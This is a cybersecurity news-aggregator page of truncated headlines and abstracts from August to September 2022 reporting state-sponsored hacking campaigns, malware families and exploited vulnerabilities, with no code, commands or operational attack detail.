Microsoft says the North Korean-sponsored Lazarus threat group is trojanizing legitimate open-source software and using it to backdoor organizations in many industry sectors, such as technology, defense, and media entertainment.BleepingComputer
September 29, 2022
Hackers Aid Protests Against Iranian Government with Proxies, Leaks and Hacks Full Text
Abstract
Several hacktivist groups are using Telegram and other tools to aid anti-government protests in Iran to bypass regime censorship restrictions amid ongoing unrest in the country following the death of Mahsa Amini in custody. "Key activities are data leaking and selling, including officials' phone numbers and emails, and maps of sensitive locations," Israeli cybersecurity firm Check Point said in a new report. The company said it has also witnessed sharing of proxies and open VPN servers to get around censorship and reports on the internet status in the country, with one group helping the anti-government demonstrators access social media sites. Chief among them is a Telegram channel called Official Atlas Intelligence Group (AIG) that's primarily focused on publishing data associated with government officials as well as maps of prominent locations. Calling itself the "CyberArmy," the group is said to have commenced its operations in May and has alsoThe Hacker News
September 28, 2022
Hackers now sharing cracked Brute Ratel post-exploitation kit online Full Text
Abstract
The Brute Ratel post-exploitation toolkit has been cracked and is now being shared for free across Russian-speaking and English-speaking hacking communities.BleepingComputer
September 28, 2022
Hacker shares how they allegedly breached Fast Company’s site Full Text
Abstract
Fast Company took its website offline after it was hacked to display stories and push out Apple News notifications containing obscene and racist comments. Today, the hacker shared how they allegedly breached the site.BleepingComputer
September 28, 2022
Hackers Using PowerPoint Mouseover Trick to Infect System with Malware Full Text
Abstract
The Russian state-sponsored threat actor known as APT28 has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware. The technique "is designed to be triggered when the user starts the presentation mode and moves the mouse," cybersecurity firm Cluster25 said in a technical report. "The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive." The dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads. The attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ( OECD ), a Paris-based intergovernmental entity. Cluster25 noted the attacks may be ongoing, conThe Hacker News
September 28, 2022
Stealthy hackers target military and weapons contractors in recent attack Full Text
Abstract
Security researchers have discovered a new campaign targeting multiple military contractors involved in weapon manufacturing, including an F-35 Lightning II fighter aircraft components supplier.BleepingComputer
September 27, 2022
North Korea-linked Lazarus continues to target job seekers with macOS malware Full Text
Abstract
North Korea-linked Lazarus APT group is targeting macOS Users searching for jobs in the cryptocurrency industry. North Korea-linked Lazarus APT group continues to target macOS with a malware campaign using job opportunities as a lure. The attackers...Security Affairs
September 27, 2022
Optus hacker apologizes and allegedly deletes all stolen data Full Text
Abstract
The hacker who claimed to have breached Optus and stolen the data of 11 million customers has withdrawn their extortion demands after facing increased attention by law enforcement. The threat actor also apologized to 10,200 people whose personal data was already leaked on a hacking forum.BleepingComputer
September 27, 2022
North Korea’s Lazarus Hackers Targeting macOS Users Interested in Crypto Jobs Full Text
Abstract
The infamous Lazarus Group has continued its pattern of leveraging unsolicited job opportunities to deploy malware targeting Apple's macOS operating system. In the latest variant of the campaign observed by cybersecurity company SentinelOne last week, decoy documents advertising positions for the Singapore-based cryptocurrency exchange firm Crypto[.]com have been used to mount the attacks. The latest disclosure builds on previous findings from Slovak cybersecurity firm ESET in August, which delved into a similar phony job posting for the Coinbase cryptocurrency exchange platform. Both these fake job advertisements are just the latest in a series of attacks dubbed Operation In(ter)ception , which, in turn, is a constituent of a broader campaign tracked under the name Operation Dream Job . Although the exact distribution vector for the malware remains unknown, it's suspected that potential targets are singled out via direct messages on the business networking site LinkeThe Hacker News
September 27, 2022
Mandiant identifies 3 hacktivist groups working in support of Russia Full Text
Abstract
Researchers are tracking multiple self-proclaimed hacktivist groups working in support of Russia, and identified 3 groups linked to the GRU. Mandiant researchers are tracking multiple self-proclaimed hacktivist groups working in support of Russia,...Security Affairs
September 26, 2022
Researchers Identify 3 Hacktivist Groups Supporting Russian Interests Full Text
Abstract
At least three alleged hacktivist groups working in support of Russian interests are likely doing so in collaboration with state-sponsored cyber threat actors, according to Mandiant. The Google-owned threat intelligence and incident response firm said with moderate confidence that "moderators of the purported hacktivist Telegram channels 'XakNet Team,' 'Infoccentr,' and 'CyberArmyofRussia_Reborn' are coordinating their operations with Russian Main Intelligence Directorate (GRU)-sponsored cyber threat actors." Mandiant's assessment is based on evidence that the leakage of data stolen from Ukrainian organizations occurred within 24 hours of malicious wiper incidents undertaken by the Russian nation-state group tracked as APT28 (aka Fancy Bear, Sofacy, or Strontium). To that end, four of the 16 data leaks from these groups coincided with disk wiping malware attacks by APT28 that involved the use of a strain dubbed CaddyWiper . APT28 , aThe Hacker News
September 26, 2022
Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor Full Text
Abstract
A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities. Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile. The intrusions involved the exploitation of CVE-2022-1040 and CVE-2022-30190 (aka "Follina"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively. "This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies," Recorded Future said in a new technical analysis. TA413, also known as LuckyCat, has been linked to relThe Hacker News
September 25, 2022
Attackers impersonate CircleCI platform to compromise GitHub accounts Full Text
Abstract
Threat actors target GitHub users to steal credentials and two-factor authentication (2FA) codes by impersonating the CircleCI DevOps platform. GitHub is warning of an ongoing phishing campaign targeting its users to steal credentials and two-factor...Security Affairs
September 25, 2022
New hacking group ‘Metador’ lurking in ISP networks for months Full Text
Abstract
A previously unknown threat actor that researchers have named 'Metador' has been breaching telecommunications, internet services providers (ISPs), and universities for about two years.BleepingComputer
September 23, 2022
Researchers unearth hacking group that’s been active, yet undetected for years Full Text
Abstract
The group attacks with variants of two Windows malware platforms deployed directly into memory, with indications of an additional Linux implant, and are capable of rapid adaptations.CyberScoop
September 23, 2022
Void Balaur Hackers-for-Hire Targeting Russian Businesses and Politics Entities Full Text
Abstract
A hack-for-hire group that was first exposed in 2019 has expanded its focus to set its sights on entities with business or political ties to Russia. Dubbed Void Balaur , the cyber mercenary collective has a history of launching cyberattacks against biotechnology and telecom companies since 2015. As many as 3,500 victims have been reported as of November 2021. "Void Balaur [...] primarily dabbles in cyber espionage and data theft, selling the stolen information to anyone willing to pay," Trend Micro noted at the time. Attacks conducted by the group are typically both generic and opportunistic and are aimed at gaining unauthorized access to widely-used email services, social media, messaging, and corporate accounts. Earlier this June, Google's Threat Analysis Group (TAG) took the wraps off a set of credential theft attacks targeting journalists, European politicians, and non-profit's mounted by the threat actor. "Void Balaur also goes after targets vaThe Hacker News
September 22, 2022
Hackers stealing GitHub accounts using fake CircleCI notifications Full Text
Abstract
GitHub is warning of an ongoing phishing campaign that started on September 16 and is targeting its users with emails that impersonate the CircleCI continuous integration and delivery platform.BleepingComputer
September 22, 2022
Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners Full Text
Abstract
A now-patched critical security flaw affecting Atlassian Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations. "If left unremedied and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as a complete domain takeover of the infrastructure and the deployment information stealers, remote access trojans (RATs), and ransomware," Trend Micro threat researcher Sunil Bharti said in a report. The issue, tracked as CVE-2022-26134 (CVSS score: 9.8), was addressed by the Australian software company in June 2022. In one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script ("ro.sh") on the victim's machine, which, in turn, fetched a second shell script ("ap.sh"). The malicious code is designed to update the PATH variable to include additional pathsThe Hacker News
September 21, 2022
Pro-Ukraine Hacktivists Claim to Have Hacked Notorious Russian Mercenary Group Full Text
Abstract
The hackers did not post any data that would help verify their claims. Motherboard could not independently verify whether the hacktivists stole the personal data of Wagner mercenaries.Vice
September 20, 2022
Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware Full Text
Abstract
A threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show. Recorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as Colibri loader and Warzone RAT . The attacks are said to be an expansion of the same campaign that previously distributed DCRat (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine. Sandworm is a destructive Russian threat group that's best known for carrying out attacks such as the 2015 and 2016 targeting of Ukrainian electrical grid and 2017's NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency. The adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical sThe Hacker News
September 19, 2022
Russian Sandworm hackers pose as Ukrainian telcos to drop malware Full Text
Abstract
The Russian state-sponsored hacking group known as Sandworm has been observed masquerading as telecommunication providers to target Ukrainian entities with malware.BleepingComputer
September 16, 2022
Opsec Mistakes Reveal COBALT MIRAGE Threat Actors Full Text
Abstract
Despite Secureworks CTU researchers publicly disclosing COBALT MIRAGE tactics, techniques, and procedures (TTPs) in May 2022, the threat actors continue to demonstrate many of the same behaviors.Secure Works
September 16, 2022
North Korean Hackers Spreading Trojanized Versions of PuTTY Client Application Full Text
Abstract
A threat with a North Korea nexus has been found leveraging a "novel spear phish methodology" that involves making use of trojanized versions of the PuTTY SSH and Telnet client. Google-owned threat intelligence firm Mandiant attributed the new campaign to an emerging threat cluster it tracks under the name UNC4034 . "UNC4034 established communication with the victim over WhatsApp and lured them to download a malicious ISO package regarding a fake job offering that led to the deployment of the AIRDRY.V2 backdoor through a trojanized instance of the PuTTY utility," Mandiant researchers said . The utilization of fabricated job lures as a pathway for malware distribution is an oft-used tactic by North Korean state-sponsored actors, including the Lazarus Group, as part of an enduring campaign called Operation Dream Job . The entry point of the attack is an ISO file that masquerades as an Amazon Assessment as part of a potential job opportunity at the tech giant.The Hacker News
September 15, 2022
Russian Gamaredon Hackers Target Ukrainian Government Using Info-Stealing Malware Full Text
Abstract
An ongoing espionage campaign operated by the Russia-linked Gamaredon group is targeting employees of Ukrainian government, defense, and law enforcement agencies with a piece of custom-made information stealing malware. "The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine," Cisco Talos researchers Asheer Malhotra and Guilherme Venere said in a technical write-up shared with The Hacker News. "LNK files, PowerShell, and VBScript enable initial access, while malicious binaries are deployed in the post-infection phase." Active since 2013, Gamaredon – also known as Actinium, Armageddon, Primitive Bear, Shuckworm, and Trident Ursa – has been linked to numerous attacks aimed at Ukrainian entities in the aftermath of Russia's military invasion of Ukraine in late February 2022. The targeted phishing operation, observed as recently as August 2022, also follows similar intrusions uncovered by Symantec last month inThe Hacker News
September 15, 2022
Webworm Hackers Using Modified RATs in Latest Cyber Espionage Attacks Full Text
Abstract
A threat actor tracked under the moniker Webworm has been linked to bespoke Windows-based remote access trojans, some of which are said to be in pre-deployment or testing phases. "The group has developed customized versions of three older remote access trojans (RATs), including Trochilus RAT , Gh0st RAT , and 9002 RAT ," the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News. The cybersecurity firm said at least one of the indicators of compromise (IOCs) was used in an attack against an IT service provider operating in multiple Asian countries. It's worth pointing out that all the three backdoors are primarily associated with Chinese threat actors such as Stone Panda (APT10), Aurora Panda (APT17), Emissary Panda (APT27), and Judgement Panda (APT31), among others, although they have been put to use by other hacking groups. Symantec said the Webworm threat actor exhibits tactical overlaps with another new adversaThe Hacker News
September 13, 2022
Chinese government hackers using diverse toolset to target Asian prime ministers, telecoms Full Text
Abstract
Hackers associated with the Chinese military are leveraging a wide range of legitimate software packages in order to load their malware payloads and target government leaders across Asia, according to the Symantec Threat Hunter team.The Record
September 13, 2022
Iranian Hackers Target High-Value Targets in Nuclear Security and Genomic Research Full Text
Abstract
Hackers tied to the Iranian government have been targeting individuals specializing in Middle Eastern affairs, nuclear security, and genome research as part of a new social engineering campaign designed to hunt for sensitive information. Enterprise security firm Proofpoint attributed the targeted attacks to a threat actor named TA453 , which broadly overlaps with cyber activities monitored under the monikers APT42, Charming Kitten, and Phosphorus. It all starts with a phishing email impersonating legitimate individuals at Western foreign policy research organizations that's ultimately designed to gather intelligence on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC). Spoofed personas include people from Pew Research Center, the Foreign Policy Research Institute (FRPI), the U.K.'s Chatham House, and the scientific journal Nature. The technique is said to have been deployed in mid-June 2022. What's different from other phishing attacks is the use of a tactThe Hacker News
September 13, 2022
New PsExec spinoff lets hackers bypass network security defenses Full Text
Abstract
Security researchers have developed an implementation of the Sysinternals PsExec utility that allows moving laterally in a network using a less monitored port.BleepingComputer
September 11, 2022
North Korea’s Lazarus hackers are exploiting Log4j flaw to hack US energy companies Full Text
Abstract
Security researchers have linked a new cyber espionage campaign targeting U.S., Canadian and Japanese energy providers to the North Korean state-sponsored Lazarus hacking group.Tech Crunch
September 09, 2022
Hackers Exploit Zero-Day in WordPress BackupBuddy Plugin in ~5 Million Attempts Full Text
Abstract
A zero-day flaw in a WordPress plugin called BackupBuddy is being actively exploited, WordPress security company Wordfence has disclosed. "This vulnerability makes it possible for unauthenticated users to download arbitrary files from the affected site which can include sensitive information," it said . BackupBuddy allows users to back up their entire WordPress installation from within the dashboard, including theme files, pages, posts, widgets, users, and media files, among others. The plugin is estimated to have around 140,000 active installations, with the flaw (CVE-2022-31474, CVSS score: 7.5) affecting versions 8.5.8.0 to 8.7.4.1. It's been addressed in version 8.7.5 released on September 2, 2022. The issue is rooted in the function called "Local Directory Copy" that's designed to store a local copy of the backups. According to Wordfence, the vulnerability is the result of the insecure implementation, which enables an unauthenticated threat actThe Hacker News
September 9, 2022
Iran-linked DEV-0270 group abuses BitLocker to encrypt victims’ devices Full Text
Abstract
Iran-linked APT group DEV-0270 (aka Nemesis Kitten) is abusing the BitLocker Windows feature to encrypt victims' devices. Microsoft Security Threat Intelligence researchers reported that Iran-linked APT group DEV-0270 (Nemesis Kitten) has been abusing...Security Affairs
September 08, 2022
North Korean Lazarus Hackers Targeting Energy Providers Around the World Full Text
Abstract
A malicious campaign mounted by the North Korea-linked Lazarus Group targeted energy providers around the world, including those based in the United States, Canada, and Japan, between February and July 2022. "The campaign is meant to infiltrate organizations around the world for establishing long-term access and subsequently exfiltrating data of interest to the adversary's nation-state," Cisco Talos said in a report shared with The Hacker News. Some elements of the espionage attacks have already entered public domain, courtesy of prior reports from Broadcom-owned Symantec and AhnLab earlier this April and May. Symantec attributed the operation to a group referred to as Stonefly, a Lazarus subgroup which is better known as Andariel, Guardian of Peace, OperationTroy, and Silent Chollima. While these attacks previously led to the instrumentation of Preft (aka Dtrack) and NukeSped (aka Manuscrypt) implants, the latest attack wave is notable for employing two other pieces of malThe Hacker News
September 08, 2022
Microsoft: Iranian hackers encrypt Windows systems using BitLocker Full Text
Abstract
Microsoft says an Iranian state-sponsored threat group it tracks as DEV-0270 (aka Nemesis Kitten) has been abusing the BitLocker Windows feature in attacks to encrypt victims' systems.BleepingComputer
September 08, 2022
North Korean Lazarus hackers take aim at U.S. energy providers Full Text
Abstract
The North Korean APT group 'Lazarus' (APT38) is exploiting VMWare Horizon servers to access the corporate networks of energy providers in the United States, Canada, and Japan.BleepingComputer
September 07, 2022
North Korean Hackers Deploying New MagicRAT Malware in Targeted Campaigns Full Text
Abstract
The prolific North Korean nation-state actor known as the Lazarus Group has been linked to a new remote access trojan called MagicRAT . The previously unknown piece of malware is said to have been deployed in victim networks that had been initially breached via successful exploitation of internet-facing VMware Horizon servers, Cisco Talos said in a report shared with The Hacker News. "While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework , with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely," Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura said . Lazarus Group , also known as APT38, Dark Seoul, Hidden Cobra, and Zinc, refers to a cluster of financial motivated and espionage-driven cyber activities undertaken by the North Korean government as a means to sidestep sanctions imposed on the country and meet its strategic objectivesThe Hacker News
September 06, 2022
Worok Hackers Target High-Profile Asian Companies and Governments Full Text
Abstract
High-profile companies and local governments located primarily in Asia are the subjects of targeted attacks by a previously undocumented espionage group dubbed Worok that has been active since late 2020. "Worok's toolset includes a C++ loader CLRLoad, a PowerShell backdoor PowHeartBeat, and a C# loader PNGLoad that uses steganography to extract hidden malicious payloads from PNG files," ESET researcher Thibaut Passilly said in a new report published today. Worok is said to share overlaps in tools and interests with another adversarial collective tracked as TA428 , with the group linked to attacks against entities spanning energy, financial, maritime, and telecom sectors in Asia as well as a government agency in the Middle East and a private firm in southern Africa. Malicious activities undertaken by the group experienced a noticeable break from May 2021 to January 2022, before resuming the next month. The Slovak cybersecurity firm assessed the group's goalsThe Hacker News
September 06, 2022
TA505 Hackers Using TeslaGun Panel to Manage ServHelper Backdoor Attacks Full Text
Abstract
Cybersecurity researchers have offered fresh insight into a previously undocumented software control panel used by a financially motivated threat group known as TA505. "The group frequently changes its malware attack strategies in response to global cybercrime trends," Swiss cybersecurity firm PRODAFT said in a report shared with The Hacker News. "It opportunistically adopts new technologies in order to gain leverage over victims before the wider cybersecurity industry catches on." Also tracked under the names Evil Corp, Gold Drake, Dudear, Indrik Spider, and SectorJ04, TA505 is an aggressive Russian cybercrime syndicate behind the infamous Dridex banking trojan and which has been linked to a number of ransomware campaigns in recent years. It's also said to be connected to the Raspberry Robin attacks that emerged in September 2021, with similarities uncovered between the malware and Dridex. Other notable malware families associated with the groupThe Hacker News
September 6, 2022
Experts discovered TeslaGun Panel used by TA505 to manage its ServHelper Backdoor Full Text
Abstract
Researchers discovered a previously undocumented software control panel, named TeslaGun, used by a cybercrime gang known as TA505. Researchers from cybersecurity firm PRODAFT have discovered a previously undocumented software control panel, tracked...Security Affairs
September 06, 2022
New Worok cyber-espionage group targets governments, high-profile firms Full Text
Abstract
A newly discovered cyber-espionage group has been hacking governments and high-profile companies in Asia since at least 2020 using a combination of custom and existing malicious tools.BleepingComputer
September 2, 2022
Traffers threat: The invisible thieves Full Text
Abstract
Traffers — from the Russian word “???????,” also referred to as “worker” — are cybercriminals responsible for redirecting Internet users network traffic to malicious content that they operate, this content being malware most of the time.Tech Republic
August 31, 2022
Microsoft Excel attacks fall out of fashion with hackers Full Text
Abstract
Security vendor Hornetsecurity said its researchers logged a significant drop over July in the volume of malware-laden emails that relied on malicious Microsoft Excel documents.Tech Target
August 30, 2022
Hackers Use ModernLoader to Infect Systems with Stealers and Cryptominers Full Text
Abstract
As many as three disparate but related campaigns between March and Jun 2022 have been found to deliver a variety of malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners onto compromised systems. "The actors use PowerShell, .NET assemblies, and HTA and VBS files to spread across a targeted network, eventually dropping other pieces of malware, such as the SystemBC trojan and DCRat , to enable various stages of their operations," Cisco Talos researcher Vanja Svajcer said in a report shared with The Hacker News. The malicious implant in question, ModernLoader , is designed to provide attackers with remote control over the victim's machine, which enables the adversaries to deploy additional malware, steal sensitive information, or even ensnare the computer in a botnet. Cisco Talos attributed the infections to a previously undocumented but Russian-speaking threat actor, citing the use of off-the-shelf tools. Potential targets included Eastern EurThe Hacker News
August 30, 2022
Chinese hackers target Australian govt with ScanBox malware Full Text
Abstract
China-based threat actors have been targeting Australian government agencies and wind turbine fleets in the South China Sea by directing select individuals to a fake impersonating an Australian news media outlet.BleepingComputer
August 27, 2022
Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations Full Text
Abstract
Iranian state-sponsored actors are leaving no stone unturned to exploit unpatched systems running Log4j to target Israeli entities, indicating the vulnerability's long tail for remediation. Microsoft attributed the latest set of activities to the umbrella threat group tracked as MuddyWater (aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is linked to the Iranian intelligence apparatus, the Ministry of Intelligence and Security (MOIS). The attacks are notable for using SysAid Server instances unsecured against the Log4Shell flaw as a vector for initial access, marking a departure from the actors' pattern of leveraging VMware applications for breaching target environments. "After gaining access, Mercury establishes persistence, dumps credentials, and moves laterally within the targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack," Microsoft said . The tech giaThe Hacker News
August 27, 2022
Threat actor abuses Genshin Impact Anti-Cheat driver to disable antivirus Full Text
Abstract
Threat actors abused a vulnerable anti-cheat driver for the Genshin Impact video game to disable antivirus software. Threat actors abused a vulnerable anti-cheat driver, named mhyprot2.sys, for the Genshin Impact video game to disable antivirus software....Security Affairs
August 26, 2022
Microsoft: Iranian attackers are using Log4Shell to target organizations in Israel Full Text
Abstract
While the threat appears to be targeted exclusively at organizations based in Israel, Microsoft is urging all organizations to check whether SysAid is present on the network and apply the firm's patches for the Log4j flaws.ZDNet
August 25, 2022
How ‘Kimsuky’ hackers ensure their malware only reach valid targets Full Text
Abstract
The North Korean 'Kimsuky' threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not on the systems of security researchers.BleepingComputer
August 25, 2022
Okta Hackers Behind Twilio and Cloudflare Breach Hit Over 130 Organizations Full Text
Abstract
The threat actor behind the attacks on Twilio and Cloudflare earlier this month has been linked to a broader phishing campaign aimed at 136 organizations that resulted in a cumulative compromise of 9,931 accounts. The activity has been condemned 0ktapus by Group-IB because the initial goal of the attacks was to "obtain Okta identity credentials and two-factor authentication (2FA) codes from users of the targeted organizations." Calling the attacks well designed and executed, the Singapore-headquartered company said the adversary singled out employees of companies that are customers of identity services provider Okta. The modus operandi involved sending targets text messages containing links to phishing sites that impersonated the Okta authentication page of the respective targeted entities. "This case is of interest because despite using low-skill methods it was able to compromise a large number of well-known organizations," Group-IB said . "FurtheThe Hacker News
August 25, 2022
Hackers abuse Genshin Impact anti-cheat system to disable antivirus Full Text
Abstract
Hackers are abusing an anti-cheat system driver for the immensely popular Genshin Impact game to disable antivirus software while conducting ransomware attacks.BleepingComputer
August 25, 2022
Threat actors are using the Tox P2P messenger as C2 server Full Text
Abstract
Threat actors are using the Tox peer-to-peer instant messaging service as a command-and-control server, Uptycs researchers reported. Tox is a peer-to-peer serverless instant messaging services that uses NaCl for encryption and decryption. Uptycs...Security Affairs
August 25, 2022
Hackers adopt Sliver toolkit as a Cobalt Strike alternative Full Text
Abstract
Threat actors are dumping the Cobalt Strike penetration testing suite in favor of similar frameworks that are less known. After Brute Ratel, the open-source, cross-platform kit called Sliver is becoming an attractive alternative.BleepingComputer
August 23, 2022
Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts Full Text
Abstract
The Iranian government-backed actor known as Charming Kitten has added a new tool to its malware arsenal that allows it to retrieve user data from Gmail, Yahoo!, and Microsoft Outlook accounts. Dubbed HYPERSCRAPE by Google Threat Analysis Group (TAG), the actively in-development malicious software is said to have been used against less than two dozen accounts in Iran, with the oldest known sample dating back to 2020. The tool was first discovered in December 2021. Charming Kitten, a prolific advanced persistent threat (APT), is believed to be associated with Iran's Islamic Revolutionary Guard Corps (IRGC) and has a history of conducting espionage aligned with the interests of the government. Tracked as APT35, Cobalt Illusion, ITG18, Phosphorus, TA453, and Yellow Garuda, elements of the group have also carried out ransomware attacks, suggesting that the threat actor's motives are both espionage and financially driven. "HYPERSCRAPE requires the victim's accountThe Hacker News
August 23, 2022
Iranian UNC3890 Targets Israel’s Key Sectors Full Text
Abstract
An Iranian threat group UNC3890 was found targeting Israeli shipping, government, healthcare, aviation, and energy sectors via watering hole attacks and credential harvesting attacks. Additionally, the researchers have discovered a UNC3890 server loaded with scraped Facebook and Instagram informati ... Read MoreCyware Alerts - Hacker News
August 23, 2022
Suspected Iranian Hackers Targeted Several Israeli Organizations for Espionage Full Text
Abstract
A suspected Iranian threat activity cluster has been linked to attacks aimed at Israeli shipping, government, energy, and healthcare organizations as part of an espionage-focused campaign that commenced in late 2020. Cybersecurity firm Mandiant is tracking the group under its uncategorized moniker UNC3890 , which is believed to conduct operations that align with Iranian interests. "The collected data may be leveraged to support various activities, from hack-and-leak, to enabling kinetic warfare attacks like those that have plagued the shipping industry in recent years," the company's Israel Research Team noted . Intrusions mounted by the group lead to the deployment of two proprietary pieces of malware: a "small but efficient" backdoor named SUGARUSH and a browser credential stealer called SUGARDUMP that exfiltrates password information to an email address associated with Gmail, ProtonMail, Yahoo, and Yandex. Also employed is a network of command-and-conThe Hacker News
August 21, 2022
Hackers target hotel and travel companies with fake reservations Full Text
Abstract
A hacker tracked as TA558 has upped their activity this year, running phishing campaigns that target multiple hotels and firms in the hospitality and travel space.BleepingComputer
August 21, 2022
White hat hackers broadcasted talks and hacker movies through a decommissioned satellite Full Text
Abstract
Hackers took control of a decommissioned satellite and broadcasted hacking conference talks and hacker movies. During the latest edition of the DEF CON hacking conference held in Las Vegas, the group of white hat hackers Shadytel demonstrated how to take...Security Affairs
August 20, 2022
North Korean hacker group Lazarus targeting Mac users with fake job ads Full Text
Abstract
The malware in the messages uses three files to compromise computers — a decoy PDF to make users think they've downloaded a legitimate attachment, a fake "font updater" app, and a downloader labeled "safarifontagent”.Independent
August 19, 2022
DoNot Team Hackers Updated its Malware Toolkit with Improved Capabilities Full Text
Abstract
The Donot Team threat actor has updated its Jaca Windows malware toolkit with improved capabilities, including a revamped stealer module designed to plunder information from Google Chrome and Mozilla Firefox browsers. The improvements also include a new infection chain that incorporates previously undocumented components to the modular framework, Morphisec researchers Hido Cohen and Arnold Osipov disclosed in a report published last week. Also known as APT-C-35 and Viceroy Tiger, the Donot Team is known for setting its sights on defense, diplomatic, government, and military entities in India, Pakistan, Sri Lanka, and Bangladesh, among others at least since 2016. Evidence unearthed by Amnesty International in October 2021 connected the group's attack infrastructure to an Indian cybersecurity company called Innefu Labs. Spear-phishing campaigns containing malicious Microsoft Office documents are the preferred delivery pathway for malware, followed by taking advantage of mThe Hacker News
August 18, 2022
Hackers Using Bumblebee Loader to Compromise Active Directory Services Full Text
Abstract
The malware loader known as Bumblebee is being increasingly co-opted by threat actors associated with BazarLoader, TrickBot, and IcedID in their campaigns to breach target networks for post-exploitation activities. "Bumblebee operators conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration," Cybereason researchers Meroujan Antonyan and Alon Laufer said in a technical write-up. Bumblebee first came to light in March 2022 when Google's Threat Analysis Group (TAG) unmasked the activities of an initial access broker dubbed Exotic Lily with ties to the TrickBot and the larger Conti collectives. Typically delivered via initial access acquired through spear-phishing campaigns, the modus operandi has since been tweaked by eschewing macro-laced documents in favor of ISO and LNK files, primarily in response to Microsoft's decision to block macros by default . "Distribution of the malware is doneThe Hacker News
August 17, 2022
Researchers Link Multi-Year Mass Credential Theft Campaign to Chinese Hackers Full Text
Abstract
A Chinese state-sponsored threat activity group named RedAlpha has been attributed to a multi-year mass credential theft campaign aimed at global humanitarian, think tank, and government organizations. "In this activity, RedAlpha very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations," Recorded Future disclosed in a new report. A lesser-known threat actor, RedAlpha was first documented by Citizen Lab in January 2018 and has a history of conducting cyber espionage and surveillance operations directed against the Tibetan community, some in India, to facilitate intelligence collection through the deployment of the NjRAT backdoor . "The campaigns [...] combine light reconnaissance, selective targeting, and diverse malicious tooling," Recorded Future noted at the time. Since then, malicious activities undertaken by the group have involved weaponizing as many as 350 domains that spoof legThe Hacker News
August 16, 2022
North Korea Hackers Spotted Targeting Job Seekers with macOS Malware Full Text
Abstract
The North Korea-backed Lazarus Group has been observed targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets. Slovak cybersecurity firm ESET linked it to a campaign dubbed " Operation In(ter)ception " that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the aerospace and military sectors into opening decoy job offer documents. The latest attack is no different in that a job description for the Coinbase cryptocurrency exchange platform was used as a launchpad to drop a signed Mach-O executable. ESET's analysis comes from a sample of the binary that was uploaded to VirusTotal from Brazil on August 11, 2022. "Malware is compiled for both Intel and Apple Silicon," the company said in a series of tweets. "It drops three files: a decoy PDF document ' Coinbase_online_careers_2022_07.pdf ', a bundle 'FinderFontsUpdater.app ,' and a downloaThe Hacker News
August 16, 2022
Chinese Cyberspies Use Supply Chain Attack to Deliver Windows, macOS Malware Full Text
Abstract
China-backed Iron Tiger APT compromised the servers of MiMi – an instant messaging application available on Windows, macOS, Android, and iOS chat applications, for a supply chain attack.Security Week
August 15, 2022
Microsoft disrupts Russian hackers’ operation on NATO targets Full Text
Abstract
The Microsoft Threat Intelligence Center (MSTIC) has disrupted a hacking and social engineering operation linked to a Russian threat actor tracked as SEABORGIUM that targets propland organizations in NATO countries.BleepingComputer
August 15, 2022
Russia-linked Shuckworm Hacker Group Maintains Focus on Ukraine Full Text
Abstract
Shuckworm (aka Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. It is generally considered to be a state-sponsored espionage operation.Symantec
August 13, 2022
Chinese Hackers Backdoored MiMi Chat App to Target Windows, Linux, macOS Users Full Text
Abstract
A pair of reports from cybersecurity firms SEKOIA and Trend Micro sheds light on a new campaign undertaken by a Chinese threat actor named Lucky Mouse that involves leveraging a trojanized version of a cross-platform messaging app to backdoor systems. Infection chains leverage a chat application called MiMi, with its installer files compromised to download and install HyperBro samples for the Windows operating system and rshell artifacts for Linux and macOS. As many as 13 different entities located in Taiwan and the Philippines have been at the receiving end of the attacks, eight of whom have been hit with rshell. The first victim of rshell was reported in mid-July 2021. Lucky Mouse, also called APT27 , Bronze Union, Emissary Panda, and Iron Tiger, is known to be active since 2013 and has a history of gaining access to targeted networks in pursuit of its political and military intelligence-collection objectives aligned with China. The advanced persistent threat actor (APT)The Hacker News
August 11, 2022
Inside the Hackers’ Toolkit – Podcast Full Text
Abstract
